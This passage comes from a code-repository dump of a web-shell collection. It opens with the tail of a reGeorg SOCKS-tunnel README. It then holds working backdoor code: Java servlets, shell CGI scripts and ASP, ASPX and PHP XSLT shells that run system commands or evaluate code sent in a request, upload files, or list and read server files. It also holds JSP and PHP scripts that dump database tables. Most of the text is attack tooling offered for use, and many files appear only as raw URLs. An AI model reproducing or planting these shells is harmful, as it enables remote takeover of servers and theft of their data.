**Step 3.** Hack the planet :) 63 | 64 | 65 | Example 66 | --------- 67 | ``` 68 | $ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp 69 | ``` 70 | 71 | License 72 | ---- 73 | 74 | MIT 75 | 76 | 77 | [@\_w\_m\_\_]:http://twitter.com/_w_m__ 78 | [@trowalts]:http://twitter.com/trowalts 79 | [@kamp_staaldraad]:http://twitter.com/kamp_staaldraad 80 | [urllib3]:https://pypi.python.org/pypi/urllib3 81 | [proxychains]:http://sourceforge.net/projects/proxychains/ 82 | -------------------------------------------------------------------------------- /servlet/CmdServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * CmdServlet.java 20/01/2004 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class CmdServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | 18 | PrintWriter out = res.getWriter(); 19 | out.print(""); 20 | out.print("

    "); 21 | out.print(""); 22 | out.print(""); 23 | out.print("
    "); 24 | 25 | if(req.getParameter("cmd") != null) { 26 | out.print("\n

    Command: " + req.getParameter("cmd") + "\n

    \n");
27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | 			int c='\0';
30 |         	while ((c=procIn.read()) != -1) {
31 | 				out.print((char)c);
32 | 				}
33 | 	        }
34 | 
35 | 		out.print("\n
    "); 36 | out.print(""); 37 | } 38 | 39 | public String getServletInfo() { 40 | return "CmdServlet 0.1"; 41 | } 42 | 43 | } 44 | -------------------------------------------------------------------------------- /servlet/UpServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * UpServlet.java 29/04/2005 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class UpServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | PrintWriter out = res.getWriter(); 18 | out.print(""); 19 | out.print("
    "); 20 | out.print("UPLOAD "); 21 | out.print(""); 22 | out.print("
    "); 23 | out.print(""); 24 | } 25 | 26 | 27 | public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 28 | String tag = new String(); 29 | int c = '\0'; 30 | int contador = 0; 31 | ServletInputStream in = req.getInputStream(); 32 | DataInputStream post = new DataInputStream(in); 33 | 34 | PrintWriter out = res.getWriter(); 35 | res.setContentType("text/html"); 36 | out.print("
    ");
37 | 
38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | 			tag=tag.concat("" + (char)c);
40 | 			contador++;
41 | 			}
42 | 
43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 | 
45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 | 
48 | 		// (!) Uploaded File Name
49 | 
50 | 		File newfile = new File("c:\\install.log");
51 | 
52 | 		/////////////////////////
53 | 
54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
55 | 
56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | 			c=post.read();
58 | 			fileout.write((char)c);
59 | 			}
60 | 
61 | 		fileout.close();
62 | 		out.print("<== OK");
63 | 
64 |     }
65 | 
66 | 
67 |     public String getServletInfo() {
68 | 		return "UpServlet 0.1";
69 |     }
70 | 
71 | }


--------------------------------------------------------------------------------
/sh/cmd.sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/sh/cmd.sh


--------------------------------------------------------------------------------
/sh/list.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | #
 3 | # SH_KIT
 4 | #
 5 | # list.sh = Directory & File Listing
 6 | #
 7 | # by: The Dark Raver
 8 | # modified: 16/12/2005
 9 | #
10 | 
11 | echo Content-Type: text/html
12 | echo
13 | 
14 | if [ "$QUERY_STRING" != "" ]
15 |   then
16 |   echo PATH: $QUERY_STRING "
    "
17 |   echo `ls $QUERY_STRING` > /tmp/test
18 |   else
19 |   echo PATH: / "
    "
20 |   echo > /tmp/test
21 |   QUERY_STRING="/"
22 |   root="1"
23 |   fi
24 | 
25 | out=`grep "/" /tmp/test`
26 | 
27 | if [ "$out" != "" ]
28 |   then
29 |     echo FICHERO: $QUERY_STRING
30 |     echo "
    "
31 |     cat $QUERY_STRING
32 |   else
33 |     if [ "$root" != "1" ]
34 |       then
35 |       echo "( ) ".."
    "
36 |       fi
37 |     for i in `ls $QUERY_STRING`
38 |       do
39 |       if [ "$root" == "1" ] 
40 |         then 
41 |         echo "( ) "$i"
    "
42 |         else 
43 |         echo "( ) "$i"
    "
44 |         fi
45 |       done
46 | 
47 |   fi


--------------------------------------------------------------------------------
/sh/up.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | #
 3 | # BETA1 - upload to /tmp/upload
 4 | #
 5 | # SH_KIT
 6 | #
 7 | # up.sh = File Upload
 8 | #
 9 | # by: The Dark Raver
10 | # modified: 16/12/2005
11 | #
12 | 
13 | echo Content-Type: text/html
14 | echo
15 | 
16 | echo ""
17 | echo "
    "
18 | echo "
    Local File: "
19 | echo ""
20 | echo "



    "
21 | 
22 | echo "
    "
23 | 
24 | dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
25 | 
26 | lineas=`cat /tmp/test | wc -l`
27 | #echo LIN: $lineas
28 | lineas2=`expr $lineas - 4`
29 | #echo LIN2: $lineas2
30 | lineas3=`expr $lineas2 - 1`
31 | #echo LIN3: $lineas3
32 | 
33 | #echo "
    "
34 | 
35 | tail -$lineas2 /tmp/test > /tmp/test2
36 | head -$lineas3 /tmp/test2 > /tmp/upload
37 | #rm /tmp/test
38 | #rm /tmp/test2
39 | 
40 | echo "
    "
41 | cat /tmp/upload
42 | echo "
    "
43 | 
44 | 


--------------------------------------------------------------------------------
/war/one.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/war/one.war


--------------------------------------------------------------------------------
/war/one/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Created-By: 1.6.0_10-rc2 (Sun Microsystems Inc.)
3 | 
4 | 


--------------------------------------------------------------------------------
/war/one/WEB-INF/web.xml:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 7 |   
 8 |     index.jsp
 9 |   
10 | 
11 | 


--------------------------------------------------------------------------------
/war/one/css1.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/war/one/css1.jsp


--------------------------------------------------------------------------------
/war/test3693.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/war/test3693.war


--------------------------------------------------------------------------------
/xml/xml.asp:
--------------------------------------------------------------------------------
1 | 
2 | cmd /c dir
3 | 


--------------------------------------------------------------------------------
/xml/xml.aspx:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 |   
 4 |     
 5 |     
 6 |     
 7 |     
 8 |     function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}
 9 |   
10 |   
11 |     
12 |   
13 | 
14 | 


--------------------------------------------------------------------------------
/xml/xml.php:
--------------------------------------------------------------------------------
1 | 
2 |  
3 |     
4 |  
5 | 
6 | 


--------------------------------------------------------------------------------
/xml/xml/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/xml/xml/1.png


--------------------------------------------------------------------------------
/xml/xml/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/xml/xml/2.png


--------------------------------------------------------------------------------
/xml/xml/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/xml/xml/3.png


--------------------------------------------------------------------------------
/xml/xml/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/xml/xml/4.png


--------------------------------------------------------------------------------
/xml/xml/WebShell系列(一)---XML.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/xml/xml/WebShell系列(一)---XML.txt


--------------------------------------------------------------------------------
/xml/xml/xslt.asp:
--------------------------------------------------------------------------------
1 | <%
2 | set xmldoc= Server.CreateObject("MSXML2.DOMDocument")
3 | xml="cmd /c dir"
4 | xmldoc.loadxml(xml)
5 | Set xsldoc = Server.CreateObject("MSXML2.DOMDocument")
6 | xlst=" function xml(x) {var a=new ActiveXObject('wscript.shell'); var exec=a.Exec(x);return exec.StdOut.ReadAll()+exec.StdErr.ReadAll(); } "
7 | xsldoc.loadxml(xlst)
8 | response.write "
    " & xmldoc.TransformNode(xsldoc)& "
    "
9 | %>


--------------------------------------------------------------------------------
/xml/xml/xslt.aspx:
--------------------------------------------------------------------------------
 1 | <%@page language="C#"%>
 2 | <%@ import Namespace="System.IO"%>
 3 | <%@ import Namespace="System.Xml"%>
 4 | <%@ import Namespace="System.Xml.Xsl"%>
 5 | <%
 6 | string xml=@"test";
 7 | string xslt=@"
 8 | 
 9 | 	
10 | 		
11 | 		
12 | 		
13 | 		
14 | 		
15 | 	
16 | 
17 | 	
18 | 
19 | ";
20 | XmlDocument xmldoc=new XmlDocument();
21 | xmldoc.LoadXml(xml);
22 | XmlDocument xsldoc=new XmlDocument();
23 | xsldoc.LoadXml(xslt);
24 | XslCompiledTransform xct=new XslCompiledTransform();
25 | xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
26 | xct.Transform(xmldoc,null,new MemoryStream());
27 | 
28 | %>


--------------------------------------------------------------------------------
/xml/xml/xslt.php:
--------------------------------------------------------------------------------
 1 |  assert($_POST[a]);';
 3 | $xsl='
 4 | 
 5 |  
 6 |     
 7 |  
 8 | ';
 9 | $xmldoc = DOMDocument::loadXML($xml);
10 | $xsldoc = DOMDocument::loadXML($xsl);
11 | $proc = new XSLTProcessor();
12 | $proc->registerPHPFunctions();
13 | $proc->importStyleSheet($xsldoc);
14 | $proc->transformToXML($xmldoc);
15 | ?> 


--------------------------------------------------------------------------------
/xssshell-xsstunnell.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/xssshell-xsstunnell.zip


--------------------------------------------------------------------------------
/脱裤脚本/MSSQL控制程序.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/MSSQL控制程序.asp


--------------------------------------------------------------------------------
/脱裤脚本/mssql.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mssql.asp


--------------------------------------------------------------------------------
/脱裤脚本/mssql.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mssql.aspx


--------------------------------------------------------------------------------
/脱裤脚本/mysql.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mysql.aspx


--------------------------------------------------------------------------------
/脱裤脚本/mysql/config.inc.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mysql/config.inc.php


--------------------------------------------------------------------------------
/脱裤脚本/mysql/data/index.htm:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/脱裤脚本/mysql/db_mysql_error.inc.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mysql/db_mysql_error.inc.php


--------------------------------------------------------------------------------
/脱裤脚本/mysql/index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mysql/index.php


--------------------------------------------------------------------------------
/脱裤脚本/mysql/pnbak.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mysql/pnbak.css


--------------------------------------------------------------------------------
/脱裤脚本/mysql/pnbak.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/mysql/pnbak.js


--------------------------------------------------------------------------------
/脱裤脚本/oracle.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page contentType="text/html;charset=gb2312"%>
 2 | <%@ page import="java.lang.*"%>
 3 | <%@ page import="java.sql.*"%>
 4 | <%@ page import="java.util.*"%>
 5 | <%@ page import="java.io.*"%>
 6 | 
 7 | 
 8 | 
 9 | xxx
10 | 
16 | 
17 | 
18 | 
19 | 
20 | 
21 | 
22 | 
23 | <%Class.forName("oracle.jdbc.driver.OracleDriver").newInstance();
24 | String url="jdbc:oracle:thin:@localhost:1521:orcl";
25 | String user="oracle_admin";
26 | String password="oracle_password";
27 | Connection conn= DriverManager.getConnection(url,user,password);
28 | Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
29 | String sql="SELECT 1,2,3,4,5,6,7,8,9,10 from user_info";
30 | ResultSet rs=stmt.executeQuery(sql);
31 | while(rs.next()) {%>
32 | 
33 | 
34 | 
35 | 
36 | 
37 | 
38 | 
39 | 
40 | 
41 | 
42 | 
43 | 
44 | <%}%>
45 | <%rs.close();
46 | stmt.close();
47 | conn.close();
48 | %>
49 | 
50 | 


--------------------------------------------------------------------------------
/脱裤脚本/oracle.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/脱裤脚本/oracle.txt


--------------------------------------------------------------------------------
/脱裤脚本/xx.php:
--------------------------------------------------------------------------------
 1 | 
    数据备份成功,数据库文件:".$filename."//blackbap.org
    ";
36 | ?>


--------------------------------------------------------------------------------

    12345678910
    <%=rs.getString(1)%><%=rs.getString(2)%><%=rs.getString(3)%><%=rs.getString(4)%><%=rs.getString(5)%><%=rs.getString(6)%><%=rs.getString(7)%><%=rs.getString(8)%><%=rs.getString(9)%><%=rs.getString(10)%>